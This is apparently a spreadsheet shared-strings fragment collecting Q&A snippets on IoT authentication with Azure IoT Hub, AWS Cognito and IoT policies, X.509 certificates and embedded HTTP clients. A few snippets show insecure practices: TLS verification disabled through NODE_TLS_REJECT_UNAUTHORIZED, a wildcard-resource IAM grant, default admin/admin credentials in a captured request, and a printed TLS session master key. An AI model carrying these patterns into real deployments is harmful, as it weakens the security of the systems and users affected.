For an authenticated Amazon Cognito identity to publish MQTT messages over HTTP on topic1 in your AWS account, you must specify two policies, as outlined here.</t>
  </si>
  <si>
    <t>Here's a link to the AmqpSample: https://github.com/Azure/azure-iot-sdk-csharp/tree/master/device/samples/DeviceClientAmqpSample
Since the SDK is open source you can walk the Microsoft.Azure.Devices.Client code and see what specific exception will be thrown for different connection failures (IotHubCommunicationException, UnauthorizedException, etc).</t>
  </si>
  <si>
    <t>See https://github.com/Azure/azure-iot-sdk-csharp/tree/master/provisioning/device/samples/ProvisioningDeviceClientX509#using-your-certificates for creating an Enrollment Group certificate.</t>
  </si>
  <si>
    <t>As seen here: https://docs.aws.amazon.com/iot/latest/developerguide/iot-policies.html
You'll also need to make sure you have created a role with an IAM policy that allows access to iot; that can be attached to whatever credentials you used to auth the MQTTclient.</t>
  </si>
  <si>
    <t>For a device to connect to an IoT hub, there are two types of connection string you can use:
A hub-scoped shared access policy that looks like: HostName=yourhubname.azure-devices.net;SharedAccessKeyName=device;SharedAccessKey=yourkey
A device connection string that looks like: HostName=yourhubname.azure-devices.net;DeviceId=yourdeviceid;SharedAccessKey=yourdevicekey
You can find the first in the Portal on your hub's "Shared access policies" page.</t>
  </si>
  <si>
    <t>Source: Authorize.Net on Wikipedia
Useful Links
Developer Center
Github Repositories
Related Tags
authorize.net-arb
authorize.net-aim
authorize.net-cim
authorize.net-webhooks
accept.js
payment-gateway</t>
  </si>
  <si>
    <t>it would replace the code you posted by:
// compute expiry value
var expires = (Date.now() / 1000) + expiresInMins * 60;
expires = Math.ceil(expires);
// generate SAS token
var sas = SharedAccessSignature.create(resourceUri, policyName, signingKey, expires);
// from then you can create a client object:
var client = Client.fromSharedAccessSignature(sas.toString());</t>
  </si>
  <si>
    <t>I won't recite everything, but the key points are:
Use the  authenticator for Let's Encrypt
Create the folder /var/www/letsencrypt and use this directory as webroot-path for Let's Encrypt
Change the following config values in /etc/gitlab/gitlab.rb and run gitlab-ctl reconfigure after that:
If you are using Mattermost which is shipped with the Omnibus package then you can additionally set these options in /etc/gitlab/gitlab.rb:
mattermost_nginx['redirect_http_to_https'] = true
mattermost_nginx['ssl_certificate']= "/etc/letsencrypt/live/gitlab.yourdomain.com/fullchain.pem"
mattermost_nginx['ssl_certificate_key'] = "/etc/letsencrypt/live/gitlab.yourdomain.com/privkey.pem"
mattermost_nginx['custom_gitlab_mattermost_server_config']="location ^~ /.well-known {\n alias /var/www/letsencrypt/.well-known;\n}\n"
After requesting your first certificate remember to change the external_url to https://... and again run gitlab-ctl reconfigure
This method is very elegant since it just mounts the directory /var/www/letsencrypt/.well-known used by the Let's Encrypt authenticator into the Gitlab web-root via a custom Nginx configuration and authentication is always possible when Gitlab is running.</t>
  </si>
  <si>
    <t>3/12/2019 8:53:11 AM info: iotedged -- Detecting if configuration file has changed...
when I'm running this script
openssl s_client -connect ADNM-CONEKEO:8883 -CAfile C:/ADNM/IoTEdge/ssl/certs/azure-iot-test-only.root.ca.cert.pem -showcerts
Here the result of my test certificate:
CONNECTED(00000048)
depth=4 CN = Azure IoT CA TestOnly Root CA
verify return:1
depth=3 CN = Azure IoT CA TestOnly Intermediate 1 CA
verify return:1
depth=2 CN = ADNM-CONEKEO.ca
verify return:1
depth=1 CN = iotedged workload ca
verify return:1
depth=0 CN = adnm-conekeo
verify return:1
16760:error:89070063:lib(137):CAPI_RSA_SIGN:cant create hash object:e_capi.c:858:Error code= 0x80090008
16760:error:14099006:SSL routines:ssl3_send_client_verify:EVP lib:s3_clnt.c:3271:
---
Certificate chain
 0 s:/CN=adnm-conekeo
   i:/CN=iotedged workload ca
-----BEGIN CERTIFICATE-----
MIIEazCCAlOgAwIBAgIBKTANBgkqhkiG9w0BAQsFADAfMR0wGwYDVQQDDBRpb3Rl
ZGdlZCB3b3JrbG9hZCBjYTAeFw0xOTAzMTIxMjUzMjRaFw0xOTA0MTExMjQ4MzBa
MBcxFTATBgNVBAMMDGFkbm0tY29uZWtlbzCCASIwDQYJKoZIhvcNAQEBBQADggEP
ADCCAQoCggEBAOHUmdNX9JDSDsxemcoSi49FhmalkBsVcG+O/L/pHk+9fTlpVM7U
FWRqSeMBlhFB5OJC4cV/thxD3hu9MakdA2ToSnVTYpnSYyBCaZdPCuMwvR+C71HW
9jB879Ta7hCAfBhwO+DGlcBQUdm27rM02lXoMiBOn2pwEdnwumYq7d5ZZUrgpY5i
gld9LDPlO8FZQRfKK6CiZdcSplpgNp4hWwBCRtdjjDz8utN0/noMUDHAshSSfrtH
+6b6sAYgRV2UGOUCXOz8MpAFHSgR7K2x6QN3bmHwBIsa2LyErIXzlg/MuFDVrMku
aifUAbtkX3nvxz5Ug41oAm03NARayRFvmD0CAwEAAaOBuTCBtjAJBgNVHRMEAjAA
MA4GA1UdDwEB/wQEAwID+DATBgNVHSUEDDAKBggrBgEFBQcDATAgBgNVHREEGTAX
ggxhZG5tLWNvbmVrZW+CB2VkZ2VodWIwHQYDVR0OBBYEFAc29idSjGRISaPFO/zk
mLs/RLLjMEMGA1UdIwQ8MDqAFIsxOxaRQcZYYd6J9ltp/zZPqx9yoR6kHDAaMRgw
FgYDVQQDDA9BRE5NLUNPTkVLRU8uY2GCAndRMA0GCSqGSIb3DQEBCwUAA4ICAQCI
uOsOzhHndpeI2cnRjTZXUtZ/3sB3E1NDO03TF9iyj93nk5VAT2tOTFV8PxCJAizd
TkWy8amPqsuOsq6/QwrnjUoMCoW1a64VRjcesiQXCG9MaM9CeyJHu/pVbGnnchtt
JBY0y1zf5ZF3DCtnk0syRj8/ER+TpqTGVGNdP9APNK5j3ld+Q080KyAa1h5q8Sq5
PevXxMjbRp3UG71dzjFlRaNHaTZRTtrfrzgzOjUYk23H6ODOXhRIHyId2OJkAZ/u
4W4BmT4s39vhfZiNnzAA4hNhWr8IzdpznUR/wvzoyBlwn/MSEFUlXd4hTFLt0vs0
rRoyKgDSj2jXhl/6xkLSQdlrIBDbdDz4en6pQEoNb5jTtmWu8HPKAOuuFUvXM7ZG
T4PMuC1ezS80Xg52HDzqxprqx9EDCSSbUdv+AhjtRvF1+/IcH3XXDQU17WHj4BVn
qeakUFyeDuq9kl71r/PfLefFaHE4qTa8ObbxSq/52x1S/RKO9scAi7/8+qlX9/GF
sGRP8KBovq6VEbCd1MHRYR7cER0CWpg3zBK3I8e/AanlCdetj1ZVW4lphXpZV7CD
kQN2vnv70Ni1jCZu7jlQWaUi/yR/GiVe/lpiXISweHmFFRoT3vCToBtxHfpeB0bx
pCEk3kzLqA7mLvyD2YpW5H2r+sVgFD9zwwY9/8SMDg==
-----END CERTIFICATE-----
 1 s:/CN=iotedged workload ca
   i:/CN=ADNM-CONEKEO.ca
-----BEGIN CERTIFICATE-----
MIIEZzCCA0+gAwIBAgICd1EwDQYJKoZIhvcNAQELBQAwGjEYMBYGA1UEAwwPQURO
TS1DT05FS0VPLmNhMB4XDTE5MDMxMjEyNTMxNFoXDTE5MDQxMTEyNDgzMFowHzEd
MBsGA1UEAwwUaW90ZWRnZWQgd29ya2xvYWQgY2EwggIiMA0GCSqGSIb3DQEBAQUA
A4ICDwAwggIKAoICAQCqoaoBLosYcrRr/gaR49IWnLwCB7r+6v+i1Zez4tt/MKNI
vF+3UPxp5v5KDG2Rz6PZveVT4SaLtRuWxaB4jOTw+0woiv/CQ2BRJkrCqp4E2bUy
QHIVjVJxZ2TzRpe967mjT5dkr9cip6aiNw13BZa3M0BIHq0E3gcAkx+ynyxJ28PZ
soqEM9+R9zlKMZiG5nAhIi4cPKGli+FzjZquwBkWC5hKm89SUI9W4y/jERwhPjJ/
foM6WkBUqQ6aQAXVaoDcZxMVzgzj3QfN3Ed4ERmlJeSoq82hkvJl9i0SDmdZMcK4
3jRhWOcpsLeacMJi7oWHGVq31rvR3S3CRxbPW2gFpX4Q9OfzQ7+c7I9F0hrMmNKA
i/12oZhJ9BIiwtHSz5hh1/JGU1XCn2ibZT+lDHWpGeHq7wYP8VH5t6HtDx5v1rnC
jwm8DSJTAgaoGXggorKRUzp8c7xG6XiPzhae9ODjuFkdbOgmse9h/yuCwyW1TnOo
Pz30gFSGUd/apPw2SMtJYt8fCd8c5ORRG7VqBF8pcmAKwQY7kElIq7TmFPxN9Y+9
RuapOp0p4hwK2c751cnxW4KdL9lT42JigwT8diUJ58fDjQIbwTusXW0aHv9WsIY1
+CM6Zsy27FIFrLpJR9orFX8P8mTtcJQy2syoQkiiPdsAPhhGiDyQkestOTfvmwID
AQABo4GxMIGuMBIGA1UdEwEB/wQIMAYBAQECAQAwDgYDVR0PAQH/BAQDAgKEMB0G
A1UdDgQWBBSLMTsWkUHGWGHeifZbaf82T6sfcjBpBgNVHSMEYjBggBSP3OqWR6Lx
9NhtQi2ttytPFiEAoqE2pDQwMjEwMC4GA1UEAwwnQXp1cmUgSW9UIENBIFRlc3RP
bmx5IEludGVybWVkaWF0ZSAxIENBghAYVJXxc+s6p0C+9bw2InZcMA0GCSqGSIb3
DQEBCwUAA4IBAQCU8EbYN5EE6BR3O16h/SsfAhyqbw+Rtu/8heRH2lGc6awuCU62
FjD/jFiuYfw4S6wc7Rqmoj+g7hi1urIIabqIy6Cc3zZiAbCKylhcFkeSSrspvdqH
KPEzDIc5ITM51llHQGPQ96AhohgCtWY/mqR/I8G1/sj5z3MARn5KfF6xibDsfrrx
hwx3eVrqdLVvUzA8KICu0nnAWlQEnhCxhDdOEQX1HeQdqoOugAWZ4X8AYg+ywxpX
ycKoujuA3HtJM7MHaQf/MzJIC4sPHE+Gp4kOQCRMdQCJI+rBdq4iOe0db8DuVKNP
pZEBz9casR3nKxxEuli8ddYjjKa+KIK0ygVw
-----END CERTIFICATE-----
 2 s:/CN=ADNM-CONEKEO.ca
   i:/CN=Azure IoT CA TestOnly Intermediate 1 CA
-----BEGIN CERTIFICATE-----
MIIDeTCCAmGgAwIBAgIQGFSV8XPrOqdAvvW8NiJ2XDANBgkqhkiG9w0BAQsFADAy
MTAwLgYDVQQDDCdBenVyZSBJb1QgQ0EgVGVzdE9ubHkgSW50ZXJtZWRpYXRlIDEg
Q0EwHhcNMTkwMzEyMTIzODMwWhcNMTkwNDExMTI0ODMwWjAaMRgwFgYDVQQDDA9B
RE5NLUNPTkVLRU8uY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDG
Gg7FnRlYha94ZUY8F/xBLch4TjWdq7nmvF1P4WrpzgPWbBbe2cHqoqxx6/w85xgK
AiTQxl+3dpJfmUnJnrchISb9IQFUu7SYtuhpgalnBnucjzL1shGfWVRPfucwBI7i
SzgN6KRf4a+w3RzW8rCseHAwyi9d1MPXHdepOhxSw/O5Xl0vj6Brgxh0JLtVvB9k
s56c3AANt/iJvH3Rvu/RHjQUxbGJ+tqBNBrWaCHibYjmX+zZsTIfLhKP/Bmj3B7+
Ea0xPweVXIjAiO6y2OVsli7Nx8bGLj+yWBr9MMaetHGfBYhKTC7qUfAC6x3RlT7/
o4D5igQN1teIC14AnK1NAgMBAAGjgaIwgZ8wDgYDVR0PAQH/BAQDAgIEMB0GA1Ud
JQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAaBgNVHREEEzARgg9BRE5NLUNPTkVL
RU8uY2EwEgYDVR0TAQH/BAgwBgEB/wIBDDAfBgNVHSMEGDAWgBRjDxJuO4t/Ewur
ELJgAvI8Kq64wTAdBgNVHQ4EFgQUj9zqlkei8fTYbUItrbcrTxYhAKIwDQYJKoZI
hvcNAQELBQADggEBAKD1JRKnSr8erOFREuq65u9S5aHQlBIZzdVsmM6iAaFGEVDY
KwE/p0BprTWZaqwpurDXgYswkcNjJoeh2uZqJKrYn8RvFRdvDNTFNbTfeFWs+ENw
eIMXVZ4TO/KIc2uKVeD6WXa6muHbfLS423nzsj/ewx5aElp0ZnGKoj1uBdtG8YgH
0pJQQtRuEdqxZVMICqI/wBVI5v+q1o+Agwwz2dV6fv5AVuKu7M7r4hfCvLnfGmX/
TCkZifyvBuLjNw3yTQ/+hQWKvkHTmJWM2BhCs2PC6NvYhc/fjQbNP/bKNXmVUWvu
ecl9Pap65NJbXmdx/YQQA/oHqN4lKz1JBZolbTI=
-----END CERTIFICATE-----
 3 s:/CN=Azure IoT CA TestOnly Intermediate 1 CA
   i:/CN=Azure IoT CA TestOnly Root CA
-----BEGIN CERTIFICATE-----
MIIDnzCCAoegAwIBAgIQP4mhsKetPZhE1MU/bfW6kDANBgkqhkiG9w0BAQsFADAo
MSYwJAYDVQQDDB1BenVyZSBJb1QgQ0EgVGVzdE9ubHkgUm9vdCBDQTAeFw0xOTAz
MTIxMjM0MjdaFw0xOTA0MTExMjQ0MjdaMDIxMDAuBgNVBAMMJ0F6dXJlIElvVCBD
QSBUZXN0T25seSBJbnRlcm1lZGlhdGUgMSBDQTCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBAMqWe5Pnpz/ffZN8zAJBoXa5n2ZmGwyXESfTOU2+aWaZUVTH
rrHt4onK4/iQM1esfG+W3WA30JXw8/wsBwkCtGSRspTThlk6tzofb0lqW7vx7bIz
+FldWH3rzwtiW3RHDnUWh1G97qgmUF2xXn1BLqTVz6DZGejF3kUnESoUmxXHrlgr
cNxjcutQxMToOjdJJLf7pjylVfBzKK7y/vYbMVzF6oWcNZJxrZxV6LQ503wbHcS9
TJhlRiDd5OhjmoIcdm2OdVGMjj1zLJZeSefPIrpR7YLLaMuid6UJ3AKXJKfJtgCH
jz8rnF6HDEylOS4NVTbbK9yzB4NonvhN8yauyWUCAwEAAaOBujCBtzAOBgNVHQ8B
Af8EBAMCAgQwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMDIGA1UdEQQr
MCmCJ0F6dXJlIElvVCBDQSBUZXN0T25seSBJbnRlcm1lZGlhdGUgMSBDQTASBgNV
HRMBAf8ECDAGAQH/AgEMMB8GA1UdIwQYMBaAFOcxTCVhPz33bQh3uye5Ha4xDjo7
MB0GA1UdDgQWBBRjDxJuO4t/EwurELJgAvI8Kq64wTANBgkqhkiG9w0BAQsFAAOC
AQEARNiFKGo6FXQB0Rj1wBOxFgToQCz56yTieXmCfTaXQfC0c2Ajda3cKU45wvRs
gp0p/yApyuqW/WxPyKWRp6ywC6KjNPa0RDSOTaEbpfzqoG2df6ULrwO6ENvSN1Lp
X0UFJo7IKUyVGOLYizIX4Jaz2muROu5MCkEeHo3JjO6gpGmaOgaazp6yLtp6SU3F
iYJFuLcIWxCWGGcHxcrEhDtgzyakha2W8FaX7hFG3IEH3PdC5zoEpyZZ/N1clHmV
wn5CUpEM5tRHSyRaUzo7lMlpuSEcJ/28jWPnL7vT2DaAZLW7KrQXkqVdOnMnP7gT
VuEaVbTcHAxpAQA2zUxoQglYHA==
-----END CERTIFICATE-----
---
Server certificate
subject=/CN=adnm-conekeo
issuer=/CN=iotedged workload ca
---
No client certificate CA names sent
Client Certificate Types: RSA sign, DSA sign, ECDSA sign
Requested Signature Algorithms: RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512
Shared Requested Signature Algorithms: RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512
Peer signing digest: SHA256
Server Temp Key: ECDH, P-384, 384 bits
---
SSL handshake has read 4594 bytes and written 1051 bytes
---
New, (NONE), Cipher is (NONE)
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : 0000
    Session-ID: 51300000E0B5BF00301BC59D91312B22165CC2B8B66A1074C6A998146E344788
    Session-ID-ctx:
    Master-Key: 34C233CA277E6BE03E469C200F41F2E42580B97C56D0C231C4C1FE3B850E45218BA5EB634F0FDEECB2869D314224F226
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1552395656
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
And when I test this sample code https://github.com/Azure/iotedge/tree/master/samples/dotnet/EdgeDownstreamDevice
I got these errors:
Cbs message missing audience property.</t>
  </si>
  <si>
    <t>See also:
https://fetch.spec.whatwg.org/ (the specification that defines the CORS protocol)
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
https://en.wikipedia.org/wiki/Same-origin_policy
5xx or 4xx error with No 'Access-Control-Allow-Origin' header is present
How to resolve 'preflight is invalid (redirect)' or 'redirect is not allowed for a preflight request'
Response to CORS preflight has HTTP status code 405
It seems the pre-flight for CORS doesn't make sense.</t>
  </si>
  <si>
    <t>I find the solution , 
My problem is that I should create a policy to allow connection to aws and attach this policy to the thing that I create , 
If nb-iot is used then we shoud configure the DNS address to Google public DNS : 8.8.8.8 and  8.8.4.4
And of course issue all commands attentively to update certificates , configure ssl context , activate tcp context and finally open mqtt connection and connect to publish or subscribe to topic</t>
  </si>
  <si>
    <t>See: https://github.com/Azure/azure-content/blob/master/articles/iot-hub/iot-hub-devguide.md#example
I made that PR after struggling with forming the password for half a day, i promise you that works :)</t>
  </si>
  <si>
    <t>When using "nc", and running server locally, the packet received is follows:
POST /configure.html HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 43
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
username=admin&amp;password=admin&amp;submit=submit
Here, the 43 byte length payload could be easily seen.</t>
  </si>
  <si>
    <t>An https server, with SSL certificates generated by me, starts running (using this library: https://github.com/fhessel/esp32_https_server)
In a PC running locally the VUE app, I make the POST request to the ESP32 server (see code below)
(Im using axios to make the request)
I have tried:
Adding a custom https aggent with 
Adding same cert in POST request that ESP32 server uses
Adding CORS headers
Adding process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0"
Starting vue dev server in https mode with ESP32 same certs
Try to obtain the OPTIONS request in ESP32 server to allow the POST request
Making the request with curl or postman works fine!!</t>
  </si>
  <si>
    <t>If your clients already all have an intermediate certificate they can use to generate a leaf cert, and if all the intermediate certs for all your devices have a common signer, then you can create an enrollment group in the provisioning service using that common signing cert and allow all your devices to provision via that enrollment group.</t>
  </si>
  <si>
    <t>When I'm trying to parse my x509 certificate to android I'm getting the key-factory Error
I have generated my x509 certificates from https://github.com/Azure/azure-iot-sdk-java/tree/master/provisioning/provisioning-tools/provisioning-x509-cert-generator 
error</t>
  </si>
  <si>
    <t>After that generated the device certificate from root certificate and tried to connect to IOT hub using sample code from below link:
After having all setup when I tried to connect to IOT bub I'm getting below error, tried all protocol - Amqp,Http,Mqtt...
Microsoft.Azure.Devices.Provisioning.Client.ProvisioningTransportException
  HResult=0x80131500
  Message={"errorCode":401002,"trackingId":"408d5ad7-aa7c-45a1-b19a-e4af41ccf54b","message":"CA certificate not found.</t>
  </si>
  <si>
    <t>In the following code snippet, a Credentials object is created and an
  Http object is authorized:
import httplib2
from google.appengine.api import memcache
from oauth2client.contrib.appengine import AppAssertionCredentials
...
credentials = AppAssertionCredentials(scope='https://www.googleapis.com/auth/devstorage.read_write')
http = credentials.authorize(httplib2.Http(memcache))
pubsub = discovery.build('pubsub', 'v1', http=http)
...
Once you have an authorized Http object, you can pass it to the
  build() or execute() functions as you normally would.</t>
  </si>
  <si>
    <t>According to the documentation I should be able to create a verification certificate with this set of code https://github.com/Azure/azure-iot-sdk-csharp/tree/master/provisioning/service/samples/GroupCertificateVerificationSample
Unfortunately it doesn't work.</t>
  </si>
  <si>
    <t>But there is a way to detect when any device subscribes and unsubscribes from a topic using the message data from AWS Reserved Topics - specifically these topics below:
You could create an IoT rule to forward all subscribed and unsubscribed events from those reserved topics to S3, DynamoDB or RDS to be queryable.</t>
  </si>
  <si>
    <t>IOTHUB_CLIENT_CONNECTION_DEVICE_DISABLED
Device could not be authenticated because it is disabled by the user on the Azure IoT Hub (see field State in Device Explorer)
IOTHUB_CLIENT_CONNECTION_BAD_CREDENTIAL
Device key provided by the user was considered invalid based on response from Azure IoT Hub upon attempt to authenticate
IOTHUB_CLIENT_CONNECTION_RETRY_EXPIRED
The Azure IoT Hub Client has a feature called RetryPolicy (which can be set using IotHubClient_SetRetryPolicy).</t>
  </si>
  <si>
    <t>Example:
device telemetry data:
publishing on topic:
devices/device1/messages/events/$.ct=application%2Fjson&amp;$.ce=utf-8&amp;abcd=1234567
IoT Hub Enrich messages:
ASA job:
select 
    *,
    GetMetadataPropertyValue(iothub, '[User]') as userprops 
into
    outAF
from 
    iothub
Output on the Azure Function (outAF):
[
  {
    "counter": 29,
    "time": "2019-08-08T13:42:26.1517415Z",
    "deviceId": "device1",
    "windSpeed": 8.2023,
    "temperature": 16.06,
    "humidity": 79.46,
    "EventProcessedUtcTime": "2019-08-08T13:42:25.7495769Z",
    "PartitionId": 1,
    "EventEnqueuedUtcTime": "2019-08-08T13:42:25.568Z",
    "IoTHub": {
      "MessageId": null,
      "CorrelationId": null,
      "ConnectionDeviceId": "device1",
      "ConnectionDeviceGenerationId": "636842046144267242",
      "EnqueuedTime": "2019-08-08T13:42:25.363Z",
      "StreamId": null
    },
    "User": {
      "abcd": "1234567",
      "status": "inprocess",
      "version": "42"
    },
    "userprops": {
      "abcd": "1234567",
      "status": "inprocess",
      "version": "42"
    }
  }
]
The following screen snippet shows an event message from a second custom endpoint for enrich messages such as the EventGrid:
{
  "id": "b983e8bf-88b5-cac3-9370-2c64037b2f1c",
  "topic": "/SUBSCRIPTIONS/00000000-0000-0000-0000-000000000000/RESOURCEGROUPS/myRG/PROVIDERS/MICROSOFT.DEVICES/IOTHUBS/myIOT",
  "subject": "devices/device1",
  "eventType": "Microsoft.Devices.DeviceTelemetry",
  "eventTime": "2019-08-08T13:42:25.363Z",
  "data": {
    "properties": {
      "abcd": "1234567",
      "status": "inprocess",
      "version": "42"
    },
    "systemProperties": {
      "iothub-content-type": "application/json",
      "iothub-content-encoding": "utf-8",
      "iothub-connection-device-id": "device1",
      "iothub-connection-auth-method": "{\"scope\":\"device\",\"type\":\"sas\",\"issuer\":\"iothub\",\"acceptingIpFilterRule\":null}",
      "iothub-connection-auth-generation-id": "636842046144267242",
      "iothub-enqueuedtime": "2019-08-08T13:42:25.363Z",
      "iothub-message-source": "Telemetry"
    },
    "body": {
      "counter": 29,
      "time": "2019-08-08T13:42:26.1517415Z",
      "deviceId": "device1",
      "windSpeed": 8.2023,
      "temperature": 16.06,
      "humidity": 79.46
    }
  },
  "dataVersion": "",
  "metadataVersion": "1"
}</t>
  </si>
  <si>
    <t>In order to implement Caleb's answer on the front-end, I had to do a couple things:
Create an IoT policy (named "default") by going to IoT Console &gt; Security &gt; Policies and copying and pasting the  policy contents into it
Add the following inline policy to my Cognito Identity Pool's authenticated role: {"Effect": "Allow", "Action": ["iot:AttachPrincipalPolicy"], "Resource": ["*"]
Then I updated my front-end code to look like:</t>
  </si>
  <si>
    <t>Here's my actual code, if it helps:
-- prior to this, we've gotten on the wifi network and acquired an IP
dofile("temp.lua") -- provides get_temp()
m = mqtt.Client("clientid", 120, "8266test", "password")
function mainloop(client) 
    print("connected - at top of loop")
    m:publish("uptime",tmr.time(),1,0, function(client) print("sent uptime") end) 
    temp, humi = get_temp()
    if (temp ~= nil) then 
        print(string.format("temp: %d", temp))
        print(string.format("humi: %d", humi))
        m:publish("temp",temp,1,0)
        m:publish("humi",humi,1,0, function(client) -- note: this callback will be used for all publish() calls
            rtctime.dsleep(SLEEP_USEC)
            end)
    end
end
m:on("connect", mainloop)
m:on("offline", function(client) is_connected = false print ("offline") end)
m:connect(MQQT_SVR, 1883, 0, mainloop,
    function(client, reason) print("failed reason: "..reason) end)</t>
  </si>
  <si>
    <t>It behaves as if the code in fact was
// Make a HTTP request:
client.print("POST ");
client.print(path);
client.print("?timeout=60&amp;api-version=2014-01");
client.print(" HTTP/1.1");
client.print("Authorization: SharedAccessSignature sr=&lt;namespace&gt;.servicebus.windows.net/&lt;myeventhubname&gt;&amp;sig=&lt;mysig&gt;&amp;se=&lt;myse&gt;&amp;skn=RootManageSharedAccessKey");
client.println("Content-Type: application/atom+xml;type=entry;charset=utf-8");
client.println("Host: &lt;namespace&gt;.servicebus.windows.net");
client.println();
client.println();
client.println("{\"value\": Hello World}");
I'm not sure what is causing this behaviour, but introducing delays might help
(Additionally, if server and path are constant strings, not likely to change for you application, you can concatenate the first 6 client.print() statements)
Giving you:
  // Make a HTTP request:
  client.print("POST https://&lt;myserver&gt;/&lt;mypath&gt;/?timeout=60&amp;api-version=2014-01 HTTP/1.1");
  client.println();
  delay(5);
  client.print("Authorization: SharedAccessSignature sr=&lt;namespace&gt;.servicebus.windows.net/&lt;myeventhubname&gt;&amp;sig=&lt;mysig&gt;&amp;se=&lt;myse&gt;&amp;skn=RootManageSharedAccessKey");
  client.println();
  delay(5);
  client.print("Content-Type: application/atom+xml;type=entry;charset=utf-8");
  client.println();
  delay(5);
  client.print("Host: &lt;namespace&gt;.servicebus.windows.net");
  client.println();
  delay(5);
  client.println();
  delay(5);
  client.print("{\"value\": Hello World}");
  client.println();
}</t>
  </si>
  <si>
    <t>And here are the test steps maybe also helpful for your reference:
Create a X.509 Self-Signed certificate via PowerShell
New-SelfSignedCertificate -DnsName "www.fabrikam.com", "www.contoso.com" -CertStoreLocation "cert:\LocalMachine\My"
Export certificate and key using command below
openssl pkcs12 -in yourpfxfile.pfx -nokeys -out publiccert.pem -nodes
openssl pkcs12 -in x.pfx  -nocerts -nodes -passin pass:123456 | openssl rsa -out privkey.pem
Add a X.509 Self-Signed certificate device on Azure portal
Download the python script from GitHub code sample link
Install the latest Azure IoT Device SDK 
python -m pip install azure-iothub-device-client 
Modify the code with the certificate, key and specific protocol</t>
  </si>
  <si>
    <t>Let's compare it to Azure IoT hub and look at what that contains:
a) reliable messages to and from hub
b) periodic health pulses
c) connected device inventory and device provisioning
d) support for multiple protocols (eg HTTP, AMQP, MQTT...)
e) access control and security using tokens
.... and more.</t>
  </si>
  <si>
    <t>In Cognito, there are no appropriate permissions for Update/Get Shadow both for authenticated and unauthenticated pool
The ARN of the Cognito Pool id as well as the IoT are incorrect
Check the IAM policy and the following policy to the Cognito users, Also for the Cognito user, you have to attach AttachPrincipalPolicy policy to give them appropriate permissions for Get/update the shadow.</t>
  </si>
  <si>
    <t>This is the request which gets printed to the console
GET /?gddf HTTP/1.1
Host: 192.168.4.1
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1
Accept-Language: en-us
DNT: 1
Cache-Control: max-age=0</t>
  </si>
  <si>
    <t>As long as the security context token has not expired, the SOAP message sender can use the same security context token to sign and/or encrypt the SOAP messages sent to the target Web service.</t>
  </si>
  <si>
    <t>Here are the few reasons why you might be getting error 403
In Cognito, there are no appropriate permissions for Update/Get Shadow both for authenticated and unauthenticated pool 
The ARN of the Cognito Pool id as well as the IoT are incorrect
Check the IAM policy and the following policy to the Cognito users, Also for the Cognito user, you have to attach AttachPrincipalPolicy policy to give them appropriate permissions for Get/update the shadow.</t>
  </si>
  <si>
    <t>the IAM policy is fine... but you need to specifically set the IoT policy to that user... so when the user is created, or now when the user logs in... call 
you should notice that method received the policyName, that is the name of the policy "in IoT policies" (not in IAM policies, so copy your policy in IoT) and the principal, that is the cognito user id
is not enough to give the IAM policy, you need to specify the attachPrincipalPolicy too</t>
  </si>
  <si>
    <t>Example:
GET /chk=on HTTP/1.1
Host: 192.168.11.6
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,pt;q=0.6
GET /favicon.ico HTTP/1.1
Host: 192.168.11.6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: /
Referer: http://192.168.11.6/on
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,pt;q=0.6
Try:
headertest = string.find(data, "favicon.ico")
if(headertest) dont parse.</t>
  </si>
  <si>
    <t>It should be something similar to this one: "Authorization: SharedAccessSignature sr=XXXXX.azure-devices.net&amp;sig=rCD5ZWvjblAl20djcEdtuL40vpKmdjvQH7lTphIRtJo%3D&amp;se=XXXXXXXXX"
The commands I use to send data to Azure using HTTPS with the SIM900 moudle are:
Initialization
Set context type: AT+SAPBR=3,1,"CONTYPE","GPRS"\r\n
Set APN: AT+SAPBR=3,1,"APN","YourAPN"\r\n
Open bearer: AT+SAPBR=1,1\r\n
Query bearer: AT+SAPBR=2,1\r\n
Enable HTTP functions: AT+HTTPINIT\r\n
